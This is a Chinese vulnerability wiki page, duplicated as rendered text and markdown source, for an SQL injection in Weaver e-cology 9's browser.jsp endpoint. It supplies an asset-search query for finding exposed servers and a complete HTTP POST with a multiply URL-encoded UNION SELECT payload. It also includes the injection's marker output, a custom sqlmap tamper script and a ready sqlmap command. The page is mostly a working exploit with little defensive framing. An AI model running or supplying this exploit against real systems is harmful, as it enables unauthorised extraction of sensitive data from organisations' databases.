fofamini-wiki

登录白背景

源码

泛微e-cology 9 browser存在SQL注入漏洞

一、漏洞简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology 9 browser存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

泛微e-cology9

三、资产测绘

hunterapp.name=="泛微 e-cology 9.0 OA"
特征

四、漏洞复现

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1222

isDis=1&browserTypeId=269&keyword=%25%32%35%36%31%25%32%35%32%37%25%32%35%32%30%25%32%35%37%35%25%32%35%36%65%25%32%35%36%39%25%32%35%36%66%25%32%35%36%65%25%32%35%32%30%25%32%35%37%33%25%32%35%36%35%25%32%35%36%63%25%32%35%36%35%25%32%35%36%33%25%32%35%37%34%25%32%35%32%30%25%32%35%33%31%25%32%35%32%63%25%32%35%32%37%25%32%35%32%37%25%32%35%32%62%25%32%35%32%38%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%32%38%25%32%35%34%33%25%32%35%34%31%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%35%37%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%32%38%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%33%64%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%32%39%25%32%35%32%30%25%32%35%35%34%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%39%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%63%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%38%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%65%25%32%35%34%34%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%32%37

qxxkq1qqkqq

tamper脚本url3encode.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
"""
SQLMap tamper script to encode payload twice with URL encoding and replace all '%' with '%25'
"""
 
import re
 
def tamper(payload, **kwargs):
    """
    Perform two URL encodings on the payload and replace all '%' with '%25'
    """
    # Perform first URL encoding
    payload = encode(payload)
    # Perform second URL encoding
    payload = encode(payload)
    # Replace all '%' with '%25'
    payload = re.sub(r'%', '%25', payload)
    return payload
 
def encode(payload):
    """
    Perform a URL encoding on the payload
    """
    encoded_payload = ""
    for char in payload:
        encoded_char = hex(ord(char)).replace("0x", "%")
        encoded_payload += encoded_char
    return encoded_payload

sqlmap -r 2.txt --batch --tamper=url3encode -p keyword --prefix="a' union select 1,''+(" --suffix=")+'" --level=5 --risk=2

原文: https://www.yuque.com/xiaokp7/ocvun2/ghfktugi1a6sffuf

# 泛微e-cology 9 browser存在SQL注入漏洞

# 一、漏洞简介
泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology 9 browser存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 泛微e-cology9

# 三、资产测绘

- hunter`app.name=="泛微 e-cology 9.0 OA"`
- 特征
![image.png](./img/IQMFNg_wq0adgbuL/1702436738823-440fba62-fae2-43a6-a483-79cb79b98856-743741.png)

# 四、漏洞复现
```
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1222

isDis=1&browserTypeId=269&keyword=%25%32%35%36%31%25%32%35%32%37%25%32%35%32%30%25%32%35%37%35%25%32%35%36%65%25%32%35%36%39%25%32%35%36%66%25%32%35%36%65%25%32%35%32%30%25%32%35%37%33%25%32%35%36%35%25%32%35%36%63%25%32%35%36%35%25%32%35%36%33%25%32%35%37%34%25%32%35%32%30%25%32%35%33%31%25%32%35%32%63%25%32%35%32%37%25%32%35%32%37%25%32%35%32%62%25%32%35%32%38%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%32%38%25%32%35%34%33%25%32%35%34%31%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%35%37%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%32%38%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%33%64%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%32%39%25%32%35%32%30%25%32%35%35%34%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%39%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%63%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%38%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%65%25%32%35%34%34%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%32%37
```
![image.png](./img/IQMFNg_wq0adgbuL/1704275240671-8eaa32d9-05ba-447c-a2f3-09a47b7d8090-251676.png)
```
qxxkq1qqkqq
```
tamper脚本`url3encode.py`
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
"""
SQLMap tamper script to encode payload twice with URL encoding and replace all '%' with '%25'
"""
 
import re
 
def tamper(payload, **kwargs):
    """
    Perform two URL encodings on the payload and replace all '%' with '%25'
    """
    # Perform first URL encoding
    payload = encode(payload)
    # Perform second URL encoding
    payload = encode(payload)
    # Replace all '%' with '%25'
    payload = re.sub(r'%', '%25', payload)
    return payload
 
def encode(payload):
    """
    Perform a URL encoding on the payload
    """
    encoded_payload = ""
    for char in payload:
        encoded_char = hex(ord(char)).replace("0x", "%")
        encoded_payload += encoded_char
    return encoded_payload
```
```
sqlmap -r 2.txt --batch --tamper=url3encode -p keyword --prefix="a' union select 1,''+(" --suffix=")+'" --level=5 --risk=2
```
![image.png](./img/IQMFNg_wq0adgbuL/1704275341225-7f5fba00-a5a1-4724-8ab2-ba7f1aa35278-372702.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ghfktugi1a6sffuf>